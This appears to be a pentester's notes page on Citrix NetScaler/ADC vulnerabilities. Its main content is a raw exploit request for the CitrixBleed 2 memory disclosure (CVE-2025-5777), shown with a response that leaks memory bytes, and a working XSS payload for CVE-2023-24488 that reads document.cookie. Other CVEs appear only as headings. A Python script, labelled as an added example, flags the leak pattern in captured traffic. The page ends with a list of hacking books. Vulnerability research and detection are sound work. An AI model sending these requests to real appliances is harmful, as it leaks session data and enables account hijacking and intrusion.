Citrix
Citrix Exploit
CitrixBleed 2 - CVE-2025-5777
Citrix Netscaler Memory Disclosure
Detection
POST /p/u/doAuthentication.do HTTP/1.0
Host: target
User-Agent: watchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowr
Content-Length: 5
Connection: keep-alive

login
Response:
HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 1962
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/vnd.citrix.authenticateresponse-1+xml; charset=utf-8
X-Citrix-Application: Receiver for Web

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<AuthenticateResponse
xmlns="http://citrix.com/authentication/response/1">
<Status>success</Status>
<Result>more-info</Result>
<StateContext>bG9naW5zY2hlbWE9ZGVmYXVsdA==</StateContext>
<AuthenticationRequirements>
<PostBack>/p/u/doAuthentication.do</PostBack>
<CancelPostBack>/p/u/doLogoff.do</CancelPostBack>
<CancelButtonText>Cancel</CancelButtonText>
<Requirements>
<Requirement>
<Credential>
<Type>none</Type>
</Credential>
<Label>
<Type>nsg-login-heading</Type>
<Text>nsg_loginHeading</Text>
</Label>
</Requirement>
<Requirement>
<Credential>
<ID>login</ID>
<SaveID>login</SaveID>
<Type>username</Type>
</Credential>
<Label>
<Text>nsg_username</Text>
<Type>nsg-login-label</Type>
</Label>
<Input>
<Text>
<ReadOnly>false</ReadOnly>
<InitialValue>É|¼C÷PkÓßYsa5ÊÞÅÐ^Ð|@ºJZõ¶@¹^ì¶Uã7Kèg Oë@¼~hL1{Xövn^ÐÛ·¹8dp}°$üüÇ)7
(÷æ¾èÂpAgc¼TowrwatchTowrw</InitialValue>
<Constraint>.+</Constraint>
</Text>
</Input>
</Requirement>
<Requirement>
<Credential>
<ID>passwd</ID>
<SaveID>passwd</SaveID>
<Type>password</Type>
</Credential>
<Label>
<Text>nsg_password1</Text>
<Type>nsg-login-label</Type>
</Label>
<Input>
<Text>
<Secret>true</Secret>
<Constraint>.+</Constraint>
</Text>
</Input>
</Requirement>
<Requirement>
<Credential>
<ID>savecredentials</ID>
<SaveID></SaveID>
<Type>savecredentials</Type>
</Credential>
<Label>
<Text>Remember my credentials</Text>
<Type>plain</Type>
</Label>
<Input>
<AssistiveText></AssistiveText>
<CheckBox>
<InitialValue>false</InitialValue>
</CheckBox>
</Input>
</Requirement>
<Requirement>
<Credential>
<ID>nsg-x1-logon-button</ID>
<Type>none</Type>
</Credential>
<Input>
<Button>Log On</Button>
</Input>
<Label>
<Type/>
</Label>
</Requirement>
<Requirement>
<Credential>
<ID>l20n-error</ID>
<SaveID></SaveID>
<Type>none</Type>
</Credential>
<Label>
<Text>Try again after some time or contact your help desk</Text>
<Type>nsg-l20n-error</Type>
</Label>
<Input/>
</Requirement>
</Requirements>
</AuthenticationRequirements>
</AuthenticateResponse>
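An added example (not part of the original page) for reviewing captured traffic offline: it checks a recorded request/response pair for the pattern shown above, a `login` parameter sent without a value and a non-empty username `<InitialValue>` in the reply. The function names, verdict labels and sample bytes are constructed for illustration, and treating any non-empty value as worth attention is an assumption.

```python
import re

# Regexes rather than an XML parser: leaked memory is rarely well-formed XML.
REQ_BLOCK = re.compile(rb"<Requirement>(.*?)</Requirement>", re.S)
INITIAL = re.compile(rb"<InitialValue>(.*?)</InitialValue>", re.S)

def login_param_without_value(request_body: bytes) -> bool:
    """True when the form body names `login` but gives it no `=value` part."""
    return any(p == b"login" for p in request_body.strip().split(b"&"))

def username_initial_value(response_body: bytes) -> bytes:
    """Bytes inside <InitialValue> of the Requirement whose ID is `login`."""
    for block in REQ_BLOCK.findall(response_body):
        if b"<ID>login</ID>" in block:
            m = INITIAL.search(block)
            return m.group(1) if m else b""
    return b""

def assess(request_body: bytes, response_body: bytes) -> str:
    """Verdict labels are hypothetical: clean, review or suspicious."""
    value = username_initial_value(response_body)
    if not value:
        return "clean"
    binary = any(b < 0x20 or b > 0x7E for b in value)
    if binary or login_param_without_value(request_body):
        return "suspicious"
    return "review"  # printable value after a normal request: check by hand

# Constructed sample responses (not real appliance output).
SAMPLE_HEAD = b"<Requirements><Requirement><Credential><ID>login</ID></Credential><Input><Text>"
SAMPLE_TAIL = b"</Text></Input></Requirement></Requirements>"
SAMPLE_LEAK = SAMPLE_HEAD + b"<InitialValue>\x8f\x02CONSTRUCTED\xfe</InitialValue>" + SAMPLE_TAIL
SAMPLE_CLEAN = SAMPLE_HEAD + b"<InitialValue></InitialValue>" + SAMPLE_TAIL

if __name__ == "__main__":
    print(assess(b"login", SAMPLE_LEAK))
    print(assess(b"login=alice&passwd=x", SAMPLE_CLEAN))
```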
PoC
CVE-2024-xxxx - Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE
CVE-2024-8068 and CVE-2024-8069
CVE-2023-4966 - Citrix Bleed: Leaking Session Tokens
CVE-2023-24488
XSS and Open Redirect in Citrix ADC and Citrix Gateway
PoC:
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E
Nuclei Template:
CVE-2023-3519 - Citrix ADC RCE
Citrix VPX 13.1-48.47
Interesting Books
The Web Application Hacker’s Handbook. The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities. Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
Real-World Bug Hunting: A Field Guide to Web Hacking. Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.